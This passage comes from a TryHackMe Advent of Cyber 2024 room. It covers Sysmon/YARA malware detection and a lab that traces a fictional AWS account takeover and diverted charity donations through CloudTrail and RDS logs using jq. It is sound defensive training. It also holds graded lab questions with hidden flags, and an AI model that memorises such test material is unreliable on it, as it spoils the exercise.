the malware, Floss should find them.
* The | symbol redirects the output of the command in front of it to the input
of the command behind it.
* Out-file C:\tools\malstrings.txt: We save the command results in a file
called malstrings.txt.
Once the command is done, open malstrings.txt, press CTRL+F, and search for the
string Mayor Malware. Enter the flag as the answer to question two. The format
of the string is THM{}.
USING YARA RULES ON SYSMON LOGS
These YARA rules are becoming a pain to Mayor Malware's backside.
If he wants his malware to be undetectable, he needs to research how YARA rules
can be used to stop him. For example, his research tells him that YARA rules can
also be used to check Sysmon logs for any artefacts left by malware! He'll need
to test this as well.
Sysmon, a tool from Microsoft's Sysinternals suite, continuously monitors and
logs system activity across reboots. This Windows service provides detailed
event data on process creation, network connections, and file changes—valuable
insights when tracing malware behaviour.
A YARA rule will look for events with event id 1: Process created for this to
work. There are many entries in the Sysmon log. To make it easier to find the
event we are looking for, we will apply a custom filter using the EventRecordID
that we can see in the log YaraMatches.txt located in C:\Tools.
Open a PowerShell window and enter the following command to check the contents
of the EDR log file:
get-content C:\Tools\YaraMatches.txt
You should get a result similar to the output below:
Administrator: Windows PowerShell
PS C:\Tools> get-content C:\Tools\YaraMatches.txt
Event Time: 10/11/2024 15:06:39
Event ID: 1
Event Record ID: 96517
Command Line: reg query "HKLM\Software\Microsoft\Windows\CurrentVersion" /v ProgramFilesDir
YARA Result: DetectShutdownTimeQuery C:\Users\Administrator\AppData\Local\Temp\2\tmp8D61.tmp
Note down the Event Record ID value. We will use this value to create a custom
filter in the Windows Event Viewer.
Next, open the Windows Event Viewer by clicking on its logo in the taskbar and,
on the left-hand side, navigate to Applications and Services Logs -> Microsoft
-> Windows -> Sysmon -> Operational.
Continue by navigating to Filter Current Log on the right-hand side of the
screen.
You should see a window like the one below:
Navigate to XML and tick the checkbox Edit query manually. Click Yes to confirm.
Finally, copy the following filter into the input box:
<QueryList>
<Query Id="0" Path="Microsoft-Windows-Sysmon/Operational">
<Select Path="Microsoft-Windows-Sysmon/Operational">
*[System[(EventRecordID="INSERT_EVENT_record_ID_HERE")]]
</Select>
</Query>
</QueryList>
Replace the EventRecordID value with the one you recorded before. Apply the
filter by clicking OK. Now you get the event related to the malware. Click on
the event and then on the Details tab. You should get the following output:
Let's take a look at the EventData that is valuable to us:
* The ParentImage key shows us which parent process spawned the cmd.exe process
to execute the registry check. We can see it was our malware located at
C:\Tools\Malware\MerryChristmas.exe.
* The ParentProcessId and ProcessId keys are valuable for follow-up research.
We could also use them to check other logs for related events.
* The User key can help us determine which privileges were used to run the
cmd.exe command. The malware could have created a hidden account and used
that to run commands.
* The CommandLine key shows which command was run in detail, helping us
identify the malware's actions.
* The UtcTime key is essential for creating a time frame for the malware's
operation. This time frame can help you focus your threat hunting efforts.
NEVER GONNA GIVE UP
His malware, it seemed, wasn't quite ready for town.
"There are watchers and scanners and rules by the ton!
If I'm not careful, they'll catch all my fun!"
Mayor Malware leaned back, tapping his fingers thoughtfully on the table. All of
this research had revealed an unsettling truth: his malware, as cunning as it
was, wasn't yet ready for the wild. There were too many tools and too many
vigilant eyes—analysts armed with YARA rules, Sysmon, and a host of detection
techniques that could expose his creation before it even had a chance to spread.
He clenched his fist, a determined glint in his eye. "Just a little more
fine-tuning," he murmured. He would study, adapt, and evolve his malware until
it was truly undetectable. When the time was right, he would unleash it upon the
unsuspecting SOC teams, striking when they least expected it.
But for now, he would wait. Watching. Planning. And he was perfecting his craft
in the shadows.
Answer the questions below
What is the flag displayed in the popup window after the EDR detects the
malware?
Login to answer..
What is the flag found in the malstrings.txt document after running floss.exe,
and opening the file in a text editor?
Login to answer..Hint
If you want to more about sandboxes, have a look at the room FlareVM: Arsenal of
Tools.
Login to answer..
Task 13 AWS log analysis Day 7: Oh, no. I'M SPEAKING IN CLOUDTRAIL!
Task includes a deployable machine
The Story
As SOC-mas approached, so did the need,
To provide those without, with something to read.
Care4Wares tried, they made it their mission,
A gift for all wares, a SOC-mas tradition.
Although they had some, they still needed more,
To pick up some books, they’d head to the store.
The town’s favourite books, would no doubt make them jolly,
They ticked off the list, as they filled up the trolley.
With the last book ticked off, the shopping was done,
When asked for their card, the ware handed them one.
“I’m sorry” he said, as the shop clerk reclined,
“I can’t sell you these books, as your card has declined.”
The ware put them back, as they walked in confusion,
How could this be? An attack? An intrusion?
And when they logged on, the ware got a scare,
To find the donations, they just weren’t there!
MONITORING IN AN AWS ENVIRONMENT
Care4Wares' infrastructure runs in the cloud, so they chose AWS as their Cloud
Service Provider (CSP). Instead of their workloads running on physical machines
on-premises, they run on virtualised instances in the cloud. These instances are
(in AWS) called EC2 instances (Amazon Elastic Compute Cloud). A few members of
the Wareville SOC aren't used to log analysis on the cloud, and with a change of
environment comes a change of tools and services needed to perform their duties.
Their duties this time are to help Care4Wares figure out what has happened to
the charity's funds; to do so, they will need to learn about an AWS service
called CloudWatch.
CloudWatch
AWS CloudWatch is a monitoring and observability platform that gives us greater
insight into our AWS environment by monitoring applications at multiple levels.
CloudWatch provides functionalities such as the monitoring of system and
application metrics and the configuration of alarms on those metrics for the
purposes of today's investigation, though we want to focus specifically on
CloudWatch logs. Running an application in a cloud environment can mean
leveraging lots of different services (e.g. a service running the application, a
service running functions triggered by that application, a service running the
application backend, etc.); this translates to logs being generated from lots of
different sources. CloudWatch logs make it easy for users to access, monitor and
store the logs from all these various sources. A CloudWatch agent must be
installed on the appropriate instance for application and system metrics to be
captured.
A key feature of CloudWatch logs that will help the Warevile SOC squad and us
make sense of what happened in their environment is the ability to query
application logs using filter patterns. Here are some CloudWatch terms you
should know before going further:
* Log Events: A log event is a single log entry recording an application
"event"; these will be timestamped and packaged with log messages and
metadata.
* Log Streams: Log streams are a collection of log events from a single source.
* Log Groups: Log groups are a collection of log streams. Log streams are
collected into a log group when logically it makes sense, for example, if the
same service is running across multiple hosts.
CloudTrail
CloudWatch can track infrastructure and application performance, but what if you
wanted to monitor actions in your AWS environment? These would be tracked using
another service called AWS CloudTrail. Actions can be those taken by a user, a
role (granted to a user giving them certain permissions) or an AWS service and
are recorded as events in AWS CloudTrail. Essentially, any action the user takes
(via the management console or AWS CLI) or service will be captured and stored.
Some features of CloudTrail include:
* Always On: CloudTrail is enabled by default for all users
* JSON-formatted: All event types captured by CloudTrail will be in the
CloudTrail JSON format
* Event History: When users access CloudTrail, they will see an option "Event
History", event history is a record of the actions that have taken place in
the last 90 days. These records are queryable and can be filtered on
attributes such as "resource" type.
* Trails: The above-mentioned event history can be thought of as the default
"trail," included out of the box. However, users can define custom trails to
capture specific actions, which is useful if you have bespoke monitoring
scenarios you want to capture and store beyond the 90-day event history
retention period.
* Deliverable: As mentioned, CloudWatch can be used as a single access point
for logs generated from various sources; CloudTrail is no different and has
an optional feature enabling CloudTrail logs to be delivered to CloudWatch.
As mentioned, Cloudtrail helps capture and record actions taken. These actions
could be interactions with any number of AWS services. For example, services
like S3 (Amazon Simple Storage Service used for object storage) and IAM (AWS's
Identity and Access Management service can be used to secure access to
your AWS environment with the creation of identities and the assigning of access
permissions to those identities) will have actions taken within their service
recorded. These recorded events can be very helpful when performing an
investigation.
INTRO TO JQ
What is JQ?
Earlier, it was mentioned that Cloudtrail logs were JSON-formatted. When
ingested in large volumes, this machine-readable format can be tricky to extract
meaning from, especially in the context of log analysis. The need then arises
for something to help us transform and filter that JSON data into meaningful
data we can understand and use to gain security insights. That's exactly what JQ
is (and does!). Similar to command line tools like sed, awk and grep, JQ is a
lightweight and flexible command line processor that can be used on JSON.
How Can It Be Used?
Now, let's take a look at how we use JQ to transform and filter JSON data. The
wares being the wares, they stored their shopping list from the trip to the
bookstore in JSON format. Let's take a look at that:
[
{ "book_title": "Wares Wally", "genre": "children", "page_count": 20 },
{ "book_title": "Charlottes Web Crawler", "genre": "young_ware", "page_count": 120 },
{ "book_title": "Charlie and the 8 Bit Factory", "genre": "young_ware", "page_count": 108 },
{ "book_title": "The Princess and the Pcap", "genre": "children", "page_count": 48 },
{ "book_title": "The Lion, the Glitch and the Wardrobe", "genre": "young_ware", "page_count": 218 }
]
JQ takes two inputs: the filter you want to use, followed by the input file. We
start our JQ filter with a . which just tells JQ we are accessing the current
input. From here, we want to access the array of values stored in our JSON (with
the []). Making our filter a .[]. For example, let’s run the following command.
JQ syntax
user@tryhackme$ jq '.[]' book_list.json
The command above would result in this output:
{
"book_title": "Wares Wally",
"genre": "children",
"page_count": 20
}
{
"book_title": "Charlottes Web Crawler",
"genre": "young_ware",
"page_count": 120
}
{
"book_title": "Charlie and the 8 Bit Factory",
"genre": "young_ware",
"page_count": 108
}
{
"book_title": "The Princess and the Pcap",
"genre": "children",
"page_count": 48
}
{
"book_title": "The Lion, the Glitch and the Wardrobe",
"genre": "young_ware",
"page_count": 218
}
Once we've accessed the array, we can grab elements from that array by going one
step deeper. For example, we could run this JQ command:
JQ syntax
user@tryhackme$ jq '.[] | .book_title' book_list.json
If we wanted to view all the book titles contained within this JSON file, this
would return a nicely formatted output like this:
"Wares Wally"
"Charlottes Web Crawler"
"Charlie and the 8 Bit Factory"
"The Princess and the Pcap"
"The Lion, the Glitch and the Wardrobe"
That's a lot nicer to look at, isn't it? It gives you an idea of what JQ is and
what it does. Of course, JQ can filter and transform JSON data in many
additional ways. In our upcoming investigation, we'll see the tool in action.
THE PECULIAR CASE OF CARE4WARES’ DRY FUNDS
Now that we have refreshed our knowledge of AWS Cloudtrail and JQ alongside
McSkidy, let’s investigate this peculiar case of Care4Wares’ dry funds.
The responsible ware for the Care4Wares charity drive gave us the following info
regarding this incident:
We sent out a link on the 28th of November to everyone in our network that
points to a flyer with the details of our charity. The details include the
account number to receive donations. We received many donations the first day
after sending out the link, but there were none from the second day on. I talked
to multiple people who claimed to have donated a respectable sum. One showed his
transaction, and I noticed the account number was wrong. I checked the link, and
it was still the same. I opened the link, and the digital flyer was the same
except for the account number.
McSkidy recalls putting the digital flyer, wareville-bank-account-qr.png, in an
Amazon AWS S3 bucket named wareville-care4wares. Let’s assist McSkidy and start
by finding out more about that link. Before that, let’s first review the
information that we currently have to start the investigation:
* The day after the link was sent out, several donations were received.
* Since the second day after sending the link, no more donations have been
received.
* A donator has shown proof of his transaction. It was made 3 days after he
received the link. The account number in the transaction was not correct.
* McSkidy put the digital flyer in the AWS S3 object
named wareville-bank-account-qr.png under the bucket wareville-care4wares.
* The link has not been altered.
CONNECTION DETAILS
Now that we have enough information, let's start the attached Virtual Machine in
this task by clicking the Start Machine button below. Note that the machine may
take 3-5 minutes to initialise.
Start Machine
The machine will start in a split-screen view. If the VM is not visible, use the
blue Show Split View button at the top right of the page.
GLITCH DID IT
Let’s examine the Cloudtrail logs related to the wareville-care4wares S3 bucket.
For a quick example, a typical S3 log entry looks like this:
{
"eventVersion": "1.10",
"userIdentity": {
"type": "IAMUser",
"principalId": "AIDAXRMKYT5O5Y2GLD4ZG",
"arn": "arn:aws:iam::518371450717:user/wareville_collector",
"accountId": "518371450717",
"accessKeyId": "AKIAXRMKYT5OZCZPGNZ7",
"userName": "wareville_collector"
},
"eventTime": "2024-10-21T22:13:24Z",
"eventSource": "s3.amazonaws.com",
"eventName": "ListObjects",
"awsRegion": "ap-southeast-1",
"sourceIPAddress": "34.247.218.56",
"userAgent": "[aws-sdk-go/0.24.0 (go1.22.6; linux; amd64)]",
"requestParameters": {
"bucketName": "aoc-cloudtrail-wareville",
"Host": "aoc-cloudtrail-wareville.s3.ap-southeast-1.amazonaws.com",
"prefix": ""
},
"responseElements": null,
"additionalEventData": {
"SignatureVersion": "SigV4",
"CipherSuite": "TLS_AES_128_GCM_SHA256",
"bytesTransferredIn": 0,
"AuthenticationMethod": "AuthHeader",
"x-amz-id-2": "yqniVtqBrL0jNyGlvnYeR3BvJJPlXdgxvjAwwWhTt9dLMbhgZugkhlH8H21Oo5kNLiq8vg5vLoj3BNl9LPEAqN5iHpKpZ1hVynQi7qrIDk0=",
"bytesTransferredOut": 236375
},
"requestID": "YKEKJP7QX32B4NZB",
"eventID": "fd80529f-d0af-4f44-8034-743d8d92bdcf",
"readOnly": true,
"resources": [
{
"type": "AWS::S3::Object",
"ARNPrefix": "arn:aws:s3:::aoc-cloudtrail-wareville/"
},
{
"accountId": "518371450717",
"type": "AWS::S3::Bucket",
"ARN": "arn:aws:s3:::aoc-cloudtrail-wareville"
}
],
"eventType": "AwsApiCall",
"managementEvent": false,
"recipientAccountId": "518371450717",
"eventCategory": "Data",
"tlsDetails": {
"tlsVersion": "TLSv1.3",
"cipherSuite": "TLS_AES_128_GCM_SHA256",
"clientProvidedHostHeader": "aoc-cloudtrail-wareville.s3.ap-southeast-1.amazonaws.com"
}
}
It might be overwhelming to see the sheer amount of information in one event,
but there are some elements that we can focus on for our investigation:
FieldDescriptionuserIdentityDetails of the user account that acted on an
object.eventTimeWhen did the action occur?eventTypeWhat type of event occurred?
(e.g., AwsApiCall or AwsConsoleSignIn, AwsServiceEvent)eventSourceFrom what
service was the event logged?eventNameWhat specific action occurred? (e.g.,
ListObjects, GetBucketObject)sourceIPAddressFrom what IP did the action
happen?userAgentWhat user agent was used to perform the action? (e.g., Firefox,
AWS CLI)requestParametersWhat parameters were involved in the action? (e.g.,
BucketName)
By using the guide above, we can read the example log entry as follows:
* The IAM user, wareville_collector, listed all objects (ListObjects event) of
the S3 bucket named aoc-cloudtrail-wareville.
* The IP address from which this request originated is 34.247.218.56.
* The user agent indicates that the request was made using the AWS SDK tool for
Go.
Now that we know where to look, let’s use JQ to filter the log for events
related to the wareville-bank-account-qr.png S3 object. The goal is to use the
same elements to filter the log file using JQ and format the results into a
table to make it more readable. According to McSkidy, the logs are stored in
the ~/wareville_logs directory.
To start, click the Terminal icon on the Desktop and enter the two commands
below:
ubuntu@tryhackme:~/
ubuntu@tryhackme:~/$ cd wareville_logs
ubuntu@tryhackme:~/$ ls
cloudtrail_log.json rds.log
With the commands above, we initially changed our current directory to the
directory McSkidy mentioned via the cd command, and we listed the directory's
contents using the ls command. As you can see, two files are inside it, but we
will focus first on the cloudtrail_log.json for this investigation.
Now, let's start investigating the CloudTrail logs by executing the command
below.
ubuntu@tryhackme:~/wareville_logs
ubuntu@tryhackme:~/wareville_logs$ jq -r '.Records[] | select(.eventSource == "s3.amazonaws.com" and .requestParameters.bucketName=="wareville-care4wares")' cloudtrail_log.json
Let's do a quick breakdown of the command we executed:
CommandDescription
jq -r 'FILTER' cloudtrail_log.json
* The -r flag tells jq to output the results in RAW format instead of JSON.
* Note that the FILTER section is enclosed with single quotes.
* The last part of the command accepts the input file, which
is cloudtrail_log.json.
.Records[]
* Instructs jq to parse the events in the Records container element.
The Records field is the top element in the JSON-formatted CloudTrail log.
| select(.eventSource == "s3.amazonaws.com" and
.requestParameters.bucketName=="wareville-care4wares")
* Uses the previous command's output, and filters it on
the eventSource and requestParameters.bucketName keys.
* The value s3.amazonaws.com is used to filter events related to the Amazon AWS
S3 service, and the value wareville-care4wares is used to filter events
related to the target S3 bucket.
As you can see in the command output, we were able to trim down the results
since all of the entries are from S3. However, it is still a bit overwhelming
since all the fields are included in the output. Now, let's refine the output by
selecting the significant fields. Execute the following command below:
ubuntu@tryhackme:~/wareville_logs
ubuntu@tryhackme:~/wareville_logs$ jq -r '.Records[] | select(.eventSource == "s3.amazonaws.com" and .requestParameters.bucketName=="wareville-care4wares") | [.eventTime, .eventName, .userIdentity.userName // "N/A",.requestParameters.bucketName // "N/A", .requestParameters.key // "N/A", .sourceIPAddress // "N/A"]' cloudtrail_log.json
As you can see, we have appended another pipe (|) after our previous filter.
Let's discuss it quickly:
CommandDescription
| [.eventTime, .eventName, .userIdentity.userName //
"N/A",.requestParameters.bucketName // "N/A", .requestParameters.key // "N/A",
.sourceIPAddress // "N/A"])'
* The piped filter uses the previous command's output and formats it to only
include the defined keys, such as .eventTime, .eventName,
and .userIdentity.userName.
* The defined keys are enclosed with square brackets ([]) to process and
create an array with the specified fields from each record.
* Note that the string // "N/A" is included purely for formatting reasons. This
means that if the defined key does not have a value, it will
display N/A instead.
As you can see in the results, we could focus on the notable items, but our
initial goal is to render the output in a table to make it easy to digest. Let's
upgrade our command with additional parameters.
ubuntu@tryhackme:~/wareville_logs
ubuntu@tryhackme:~/wareville_logs$ jq -r '["Event_Time", "Event_Name", "User_Name", "Bucket_Name", "Key", "Source_IP"],(.Records[] | select(.eventSource == "s3.amazonaws.com" and .requestParameters.bucketName=="wareville-care4wares") | [.eventTime, .eventName, .userIdentity.userName // "N/A",.requestParameters.bucketName // "N/A", .requestParameters.key // "N/A", .sourceIPAddress // "N/A"]) | @tsv' cloudtrail_log.json | column -t
You may observe that we have added the following items to our command:
CommandDescription
jq -r '["Event_Time", "Event_Name", "User_Name", "Bucket_Name", "Key",
"Source_IP"], SELECT_FILTER | SPECIFIC FIELDS'
* The new command prepends a column header row and is defined using square
brackets since it is an array that corresponds to the selected fields.
* Note that a comma is used before the select filter to combine with those of
the select filter results we previously used.
| @tsv'
* Sets each array element, the output processed after the filters, as a line of
tab-separated values.
| column -t -s $'\t'
* It takes the output of the jq command, now resulting in tab-separated values,
and beautifies its result by processing all tabs and aligning the columns.
Note: Our crafted command lets us summarise S3 activities from a CloudTrail log.
Now that we have crafted a JQ query that provides a well-refined output, let’s
look at the results and observe the events. Based on the columns, we can answer
the following questions to build our assumptions:
* How many log entries are related to the wareville-care4wares bucket?
* Which user initiated most of these log entries?
* Which actions did the user perform based on the eventName field?
* Were there any specific files edited?
* What is the timestamp of the log entries?
* What is the source IP related to these log entries?
Looking at the results, 5 logged events seem related to
the wareville-care4wares bucket, and almost all are related to the user
glitch. Aside from listing the objects inside the bucket (ListOBject event), the
most notable detail is that the user glitch uploaded the
file wareville-bank-account-qr.png on November 28th. This seems to coincide with
the information we received about no donations being made 2 days after the link
was sent out.
McSkidy is sure there was no user glitch in the system before. There is no one
in the city hall with that name, either. The only person that McSkidy knows with
that name is the hacker who keeps to himself. McSkidy suggests that we look into
this anomalous user.
MCSKIDY FOOLED US?
McSkidy wants to know what this anomalous user account has been used for, when
it was created, and who created it. Enter the command below to see all the
events related to the anomalous user. We can focus our analysis on the following
questions:
* What event types are included in these log entries?
* What is the timestamp of these log entries?
* Which IPs are included in these log entries?
* What tool/OS was used in these log entries?
ubuntu@tryhackme:~/wareville_logs
ubuntu@tryhackme:~/wareville_logs$ jq -r '["Event_Time", "Event_Source", "Event_Name", "User_Name", "Source_IP"],(.Records[] | select(.userIdentity.userName == "glitch") | [.eventTime, .eventSource, .eventName, .userIdentity.userName // "N/A", .sourceIPAddress // "N/A"]) | @tsv' cloudtrail_log.json | column -t -s $'\t'
The results show that the user glitch mostly targeted the S3 bucket. The notable
event is the ConsoleLogin entry, which tells us that the account was used to
access the AWS Management Console using a browser.
We still need information about which tool and OS were used in the requests.
Let's view the userAgent value related to these events using the following
command.
ubuntu@tryhackme:~/wareville_logs
ubuntu@tryhackme:~/wareville_logs$ jq -r '["Event_Time", "Event_type", "Event_Name", "User_Name", "Source_IP", "User_Agent"],(.Records[] | select(.userIdentity.userName == "glitch") | [.eventTime,.eventType, .eventName, .userIdentity.userName //"N/A",.sourceIPAddress //"N/A", .userAgent //"N/A"]) | @tsv' cloudtrail_log.json | column -t -s $'\t'
There are two User-Agent values included in all log entries related to
the glitch user:
CommandDescription
S3Console/0.4, aws-internal/3 aws-sdk-java/1.12.750
Linux/5.10.226-192.879.amzn2int.x86_64 OpenJDK_64-Bit_Server_VM/25.412-b09
java/1.8.0_412 vendor/Oracle_Corporation cfg/retry-mode/standard
* This is the userAgent string for the internal console used in AWS. It doesn’t
provide much information.
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/129.0.0.0 Safari/537.36
* This userAgent string provides us with 2 pieces of interesting information.
* The anomalous account uses a Google Chrome browser within a Mac OS system.
An experienced attacker can forge these values, but we should not dismiss this
information. It can be valuable when comparing different log entries for the
same user. We will park the current information for now, let's gather more
information to connect the dots.
The next interesting event to look for is who created this anomalous user
account. We will filter for all IAM-related events, and this can be done by
using the select filter .eventSource == "iam.amazonaws.com". Let's execute the
command below, and try to answer the following questions:
* What Event Names are included in the log entries?
* What user executed these events?
* What is this user’s IP?
ubuntu@tryhackme:~/wareville_logs
ubuntu@tryhackme:~/wareville_logs$ jq -r '["Event_Time", "Event_Source", "Event_Name", "User_Name", "Source_IP"], (.Records[] | select(.eventSource == "iam.amazonaws.com") | [.eventTime, .eventSource, .eventName, .userIdentity.userName // "N/A", .sourceIPAddress // "N/A"]) | @tsv' cloudtrail_log.json | column -t -s $'\t'
Based on the results, there are many ListPolicies events. By ignoring these
events, it seems that the most significant IAM activity is about the
user mcskidy invoking the CreateUser action and consequently invoking
the AttachUserPolicy action. The source IP where the requests were made
is 53.94.201.69. Remember that it is the same IP the anomalous user glitch used.
Let’s have a more detailed look at the event related to the CreateUser action by
executing the command below:
ubuntu@tryhackme:~/wareville_logs
ubuntu@tryhackme:~/wareville_logs$ jq '.Records[] |select(.eventSource=="iam.amazonaws.com" and .eventName== "CreateUser")' cloudtrail_log.json
Based on the request parameters of the output, it can be seen that it was the
user, mcskidy, who created the anomalous account.
Now, we need to know what permissions the anomalous user has. It could be
devastating if it has access to our whole environment. We need to filter for
the AttachUserPolicy event to uncover the permissions set for the newly created
user. This event applies access policies to users, defining the extent of access
to the account. Let's filter for the specific event by executing the command
below.
ubuntu@tryhackme:~/wareville_logs
ubuntu@tryhackme:~/wareville_logs$ jq '.Records[] | select(.eventSource=="iam.amazonaws.com" and .eventName== "AttachUserPolicy")' cloudtrail_log.json
McSkidy is baffled by these results. She knows that she did not create the
anomalous user and did not assign the privileged access. She also doesn’t
recognise the IP address involved in the events and does not use a Mac OS; she
only uses a Windows machine. All this information is different to the typical IP
address and machine used by McSkidy, so she wants to prove her innocence and
asks to continue the investigation.
LOGS DON’T LIE
McSkidy suggests looking closely at the IP address and operating system related
to all these anomalous events. Let's use the following command below to continue
with the investigation:
ubuntu@tryhackme:~/wareville_logs
ubuntu@tryhackme:~/wareville_logs$ jq -r '["Event_Time", "Event_Source", "Event_Name", "User_Name", "Source_IP"], (.Records[] | select(.sourceIPAddress=="53.94.201.69") | [.eventTime, .eventSource, .eventName, .userIdentity.userName // "N/A", .sourceIPAddress // "N/A"]) | @tsv' cloudtrail_log.json | column -t -s $'\t'
Based on the command output, three user accounts (mcskidy, glitch,
and mayor_malware) were accessed from the same IP address. The next step is to
check each user and see if they always work from that IP.
Let’s focus on each user and see if they always work from that IP. Enter the
command below, and replace the PLACEHOLDER with the username.
ubuntu@tryhackme:~/wareville_logs
ubuntu@tryhackme:~/wareville_logs$ jq -r '["Event_Time","Event_Source","Event_Name", "User_Name","User_Agent","Source_IP"],(.Records[] | select(.userIdentity.userName=="PLACEHOLDER") | [.eventTime, .eventSource, .eventName, .userIdentity.userName // "N/A",.userAgent // "N/A",.sourceIPAddress // "N/A"]) | @tsv' cloudtrail_log.json | column -t -s $'\t'
While gathering the information for each user, we can focus our investigation on
the following questions:
* Which IP does each user typically use to log into AWS?
* Which OS and browser does each user usually use?
* Are there any similarities or explicit differences between the IP addresses
and operating systems used?
Based on the results, we have proven that McSkidy used a different IP address
before the unusual authentication was discovered. Moreover, all evidence seems
to point towards another user after correlating the IP address and User-Agent
used by each user. Who do you think it could be? McSkidy has processed all the
investigation results and summarized them below:
* The incident starts with an anomalous login with the user
account mcskidy from IP 53.94.201.69.
* Shortly after the login, an anomalous user account glitch was created.
* Then, the glitch user account was assigned administrator permissions.
* The glitch user account then accessed the S3 bucket
named wareville-care4wares and replaced
the wareville-bank-account-qr.png file with a new one. The IP address and
User-Agent used to log into the glitch, mcskidy, and mayor_malware accounts
were the same.
* the User-Agent string and Source IP of recurrent logins by the user
account mcskidy are different.
DEFINITE EVIDENCE
McSkidy suggests gathering stronger proof that that person was behind this
incident. Luckily, Wareville Bank cooperated with us and provided their database
logs from their Amazon Relational Database Service (RDS). They also mentioned
that these are captured through their CloudWatch, which differs from the
CloudTrail logs as they are not stored in JSON format. For now, let’s look at
the bank transactions stored in the ~/wareville_logs/rds.log file.
Since the log entries are different from the logs we previously investigated,
McSkidy provided some guidance on how to analyse them. According to her, we can
use the following command to show all the bank transactions.
Note: Grep is a Unix command-line utility used for searching strings within a
file or an input stream.
ubuntu@tryhackme:~/wareville_logs
ubuntu@tryhackme:~/wareville_logs$ grep INSERT rds.log
From the command above, McSkidy explained that all INSERT queries from the RDS
log pertain to who received the donations made by the townspeople. Given this,
we can see in the output the two recipients of all donations made within
November 28th, 2024.
ubuntu@tryhackme:~/wareville_logs
---REDACTED FOR BREVITY---
2024-11-28T15:22:17.728Z 2024-11-28T15:22:17.728648Z 263 Query INSERT INTO wareville_bank_transactions (account_number, account_owner, amount) VALUES ('8839 2219 1329 6917', 'Care4wares Fund', 342.80)
2024-11-28T15:22:18.569Z 2024-11-28T15:22:18.569279Z 263 Query INSERT INTO wareville_bank_transactions (account_number, account_owner, amount) VALUES ('8839 2219 1329 6917', 'Care4wares Fund', 929.57)
2024-11-28T15:23:02.605Z 2024-11-28T15:23:02.605700Z 263 Query INSERT INTO wareville_bank_transactions (account_number, account_owner, amount) VALUES ('----- REDACTED ----', 'Mayor Malware', 193.45)
2024-11-28T15:23:02.792Z 2024-11-28T15:23:02.792161Z 263 Query INSERT INTO wareville_bank_transactions (account_number, account_owner, amount) VALUES ('----- REDACTED ----', 'Mayor Malware', 998.13)
---REDACTED FOR BREVITY---
As shown above, the Care4wares Fund received all the donations until it changed
into a different account at a specific time. The logs also reveal who received
the donations afterwards, given the account owner's name. With all these
findings, McSkidy confirmed the assumptions made during the investigation of the
S3 bucket since the sudden change in bank details was reflected in the database
logs. The timeline of events collected by McSkidy explains the connection of
actions conducted by the culprit.
TimestampSourceEvent2024-11-28 15:22:18CloudWatch RDS logs (rds.log)Last
donation received by the Care4wares Fund.2024-11-28 15:22:39CloudTrail logs
(cloudtrail_log.json)Bank details update on S3 bucket.2024-11-28
15:23:02CloudWatch RDS logs (rds.log)First donation received by Mayor Malware.
Answer the questions below
What is the other activity made by the user glitch aside from the ListObject
action?
Login to answer..
What is the source IP related to the S3 bucket activities of the user glitch?
Login to answer..
Based on the eventSource field, what AWS service generates the ConsoleLogin
event?
Login to answer..
When did the anomalous user trigger the ConsoleLogin event?
Login to answer..
What was the name of the user that was created by the mcskidy user?
Login to answer..Hint
What type of access was assigned to the anomalous user?
Login to answer..Hint
Which IP does Mayor Malware typically use to log into AWS?
Login to answer..
What is McSkidy's actual IP address?
Login to answer..
What is the bank account number owned by Mayor Malware?
Login to answer..
Want to learn more about log analysis and how to interpret logs from different
sources? Check out the Log Universe room!
Login to answer..
Created by
tryhackme
ar33zy
cmnatic
Dex01
timtaylor
munra
hk
strategos
Fontaene
SecurityNomad
am03bam4n
umairalizafar
hadrian3689
melmols
Maxablancas
1337rce
MartaStrzelec
DrGonz0
arebel
h4sh3m00
l000g1c
rePl4stic
Aashir.Masood
str3g4tt4
Room Type
Free Room. Anyone can deploy virtual machines in the room (without being
subscribed)!
Users in Room
108,476
Created
today
LEARNING
* Hands-on labs
* For Business
* For Education
* Competitive Hacking
RESOURCES
* About Us
* Newsroom
* Blog
* Glossary
* Work at TryHackMe
* Careers in Cyber
SHOP
* Buy Vouchers
* Swag Shop
GET IN TOUCH
* Contact Us
* Forum
We're a gamified, hands-on cyber security training platform that you can access
through your browser.
128 City Road, London, United Kingdom, EC1V 2NX
Copyright TryHackMe 2018-2024
Privacy PolicyTerms of UseAI Terms of UseAcceptable Use PolicyCookie Policy
Exit split view
We use cookies to ensure you get the best user experience. For more information
contact us.
Read moreGot it!
YOU'RE IN… BUT CAN YOUR FRIENDS CRACK IT TOO?
ADVENT OF CYBER 2024
Share this with your friends. Grab your share of $100,000 in prizes!
LinkedinTwitter / XFacebook